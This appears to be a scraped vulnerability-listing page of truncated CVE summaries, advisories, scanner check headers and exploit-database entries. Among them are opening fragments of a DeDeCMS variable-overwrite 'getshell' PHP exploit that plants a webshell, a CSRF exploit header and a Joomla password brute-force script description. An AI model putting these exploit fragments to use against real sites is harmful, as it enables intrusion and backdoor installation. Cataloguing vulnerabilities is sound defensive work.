CVE-2009-5103

Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

Cross site scripting

Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

CVE-2009-5103

Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

Affected versions: DEDECMS full version The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...

asterisk -- remote crash vulnerability in SIP channel driver

Asterisk project reports: A remote authenticated user can cause a crash with a malformed request due to an unitialized variable...

Code injection

Array index error in GroupWise Internet Agent GWIA in Novell GroupWise 8.0 before HP3 allows remote attackers to execute arbitrary code via a crafted yearly RRULE variable in a VCALENDAR attachment in an e-mail message...

Wireshark Multiple Denial of Service Vulnerabilities - Windows

Wireshark is prone to multiple denial of service vulnerabilities. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

DeDeCMS(weaving dreams)variable overwrite 0day getshell-a vulnerability warning-the black bar safety net

! usr/bin/php-w ? php errorreportingEERROR; settimelimit0; printr' DEDEcms Variable Coverage Exploit Author: www.heixiaozi.com www.webvul.com ; echo "\r\n"; if$argv2==null printr' +---------------------------------------------------------------------------+ Usage: php '.$ argv0.' url aid path aid...

DeDeCMS(织梦) 变量覆盖(CVE-2015-4553)

简要描述： 1.受影响版本DEDECMS 5.7、5.6、5.5。 2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞，可以任意覆盖任意全局变量。 漏洞危害： 1.黑客可以通过此漏洞来重定义数据库连接。 2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。 !usr/bin/php -w 12 echo " Exploit Success \n"; if$aid==1echo " Shell:".$url."/$path/data/cache/fuck.php\n" ; if$aid==2echo "...

CentOS 5 : bash (CESA-2011:1073)

An updated bash package that fixes one security issue, several bugs, and adds one enhancement is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System CVSS base score, which gives...

CentOS Update for bash CESA-2011:1073 centos5 i386

Check for the Version of bash OpenVAS Vulnerability Test CentOS Update for bash CESA-2011:1073 centos5 i386 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...

Google Chrome < 14.0.835.163 Multiple Vulnerabilities

Binary data 800955.prm...

Denial of service

SystemTap 1.4 and earlier, when unprivileged aka stapusr mode is enabled, allows local users to cause a denial of service divide-by-zero error and OOPS via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access...

http-joomla-brute NSE Script

Performs brute force password auditing against Joomla web CMS installations. This script initially reads the session cookie and parses the security token to perfom the brute force password auditing. It uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are...

CVE-2011-2907

Terascale Open-Source Resource and Queue Manager aka TORQUE Resource Manager 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBSOHOST variable to the qsub program...

CVE-2011-2907

Terascale Open-Source Resource and Queue Manager aka TORQUE Resource Manager 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBSOHOST variable to the qsub program...

Design/Logic Flaw

Terascale Open-Source Resource and Queue Manager aka TORQUE Resource Manager 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBSOHOST variable to the qsub program...

CVE-2011-2907

TORQUE Resource Manager (Terascale Open-Source Resource and Queue Manager) versions 3.0.1 and earlier are vulnerable to a remote-auth bypass via a modified PBS_O_HOST passed to qsub, enabling submission of arbitrary jobs. This is a remote, unauthenticated issue with potential for privilege escala...

Prediction Football 2.51 - Cross-Site Request Forgery

Prediction Football 2.51 - Cross-Site Request Forgery Exploit Title: title Google Dork: if relevant intext:"Prediction football 2.51" Date: 08/08/2011 Author: Smith Falcon Software Link: http://www.predictionfootball.com/download/download.html Version: 2.51 Tested on: Linux First create a usernam...

About Dedecms variable coverage exploits-vulnerability warning-the black bar safety net

Someone recently broke the dedecms variable coverage holes,it is also a quite interesting vulnerability, and in some cases dedecms this variable vulnerability to exist for so long in some people are many years,about six months ago I also independently discovered by 本文 [email protected] Write ...